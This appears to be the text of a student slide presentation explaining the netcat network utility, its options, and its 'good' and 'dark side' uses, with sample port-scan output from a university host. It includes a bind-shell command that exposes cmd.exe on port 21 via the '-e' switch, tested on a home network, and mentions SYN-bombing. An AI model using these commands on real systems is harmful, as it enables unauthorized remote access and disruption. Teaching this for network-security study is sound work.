netcat
Purpose of Presentation…?
Analyze the network Identify the network security issues
How to do it …?
First Step Research the Network
Tools for Research
Information Gathering tools Forensic tools Network Utility tools Password Auditing tools Recovery And Restoration Tools Vulnerability Scanning & Analysis tools
What is netcat ?
Swiss Army Knife of Network A versatile network Utility tool Uses TCP and UDP protocol Designed as a backend tool
Can be used directlyDriven by other programs
Power of netcat
Can create Outbound or Inbound connections TCP or UDP to or from any ports
Full DNS forward reverse checking Can use any local port Can use any locally configured network
address Port scanning with randomizer Option to let other program service
establish connections Optional telnet responder
How Do I use netcat ?
General form of usage is nc [switches] [hostname] [portnumber]
Simplest Usage would benc –v www.msn.com 80Use GET method GET / HTTP/1.0
Hostname can be a name or IP Address
Use of –n switch If not specified performs forward and reverse
DNS look up Reports the problem of mismatched names in
DNS
D:\tools\nc>nc -v www.hotmail.com 80DNS fwd/rev mismatch: www.hotmail.com != hotmail.seDNS fwd/rev mismatch: www.hotmail.com != ld.cb.msn.comDNS fwd/rev mismatch: www.hotmail.com != ld.cb.msn.comwww.hotmail.com [207.68.171.233] 80 (http) open
IF specified will take only IPAddress as hostname argument
Options
-vControls the verbosity level
-w <seconds>Sets the network inactivity timeout
-p <port number>Binds the connection to specific port
number
Options
-o <file name>To obtain hexdump file of data sent
either way -l
Makes netcat wait for inbound connections
And once connection is established it transfers the data
Interesting -l
Can use to create like a listening netcat server
On listening endD:\tools\nc>nc –l -p 1234 < test.txt
On client end D:\tools\nc>nc 192.168.0.100 1234
Options
-LListen harder
-rRandomize port numbers
-zZero – I/O mode [used in scanning]
Options
-e <program name>Allows to execute a program
(dangerous) -d
Allows to run in detached mode without console window
-uMakes a UDP connection instead of
TCP connection
Options
-s <address>Local source address
-i <seconds>Specifies delay interval for lines sent
or ports scanned -t
Answer telnet negotiation
Put the Knife to Use
Use It GOOD
Use It BAD
USE IT GOOD
Port Scanning
Find what is out there
• nc –v –w 5 –r davinci.newcs.uwindsor.ca 20-30
D:\tools\nc>nc -v -w 5 -r davinci.newcs.uwindsor.ca 20-30davinci.newcs.uwindsor.ca [137.207.76.3] 22 (?) openSSH-2.0-Sun_SSH_1.0davinci.newcs.uwindsor.ca [137.207.76.3] 28 (?) opendavinci.newcs.uwindsor.ca [137.207.76.3] 20 (ftp-data) opendavinci.newcs.uwindsor.ca [137.207.76.3] 23 (telnet) openinternet2 proxy-telnet [v3.1] ready
√☺Please enter your userid: davinci.newcs.uwindsor.ca [137.207.76.3] 24 (?) opendavinci.newcs.uwindsor.ca [137.207.76.3] 30 (?) opendavinci.newcs.uwindsor.ca [137.207.76.3] 25 (smtp) open220-Sendmail 8.6.12/8.6.12 ready on internet2220 ESMTP spoken heredavinci.newcs.uwindsor.ca [137.207.76.3] 26 (?) opendavinci.newcs.uwindsor.ca [137.207.76.3] 29 (?) opendavinci.newcs.uwindsor.ca [137.207.76.3] 27 (?) opendavinci.newcs.uwindsor.ca [137.207.76.3] 21 (ftp) open220- internet2 proxy-ftp [v3.1] ready220 Please enter your userid
D:\tools\nc>
USE IT GOOD
Simple Data Transfer AgentImmaterial which side is server and
which side is clientInput at one goes as output to another
HEX Dump FeatureCan be used to analyze odd network
protocols
USE IT GOOD
Performance Testing
Generate large amount of useless data on network with server on one end and client on other end we can use it to test network performance.
Protect your workstations X server
DARK SIDE
Scanning for vulnerable servicesCan use files as input to netcat and
scan the system by using –i and –r switches
Can use –e option to execute programs
SYN-Bombing Can disable TCP servers
EXAMPLE
Listen on port 21 (FTP Port) using netcat with –e switch to execute cmd.exe
FTP request made from a different machine on the listener machine
RESULT
D:\tools\nc>nc -l -p 21 -e cmd.exeLISTENER
C:\Documents and Settings\RAJAT>ftp 192.168.0.100Connected to 192.168.0.100.Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.
D:\tools\nc>Request
Environment
Local Home Network
ISP --- CogecoThree PC’s OS Windows XPConnected via DLink RouterCat 5 connecting cables used
Conclusion
Netcat is a very useful network utility tool
Very light but extremely effective Particularly when it can listen and
execute programs when connection requests are made on the specific ports
THANK YOU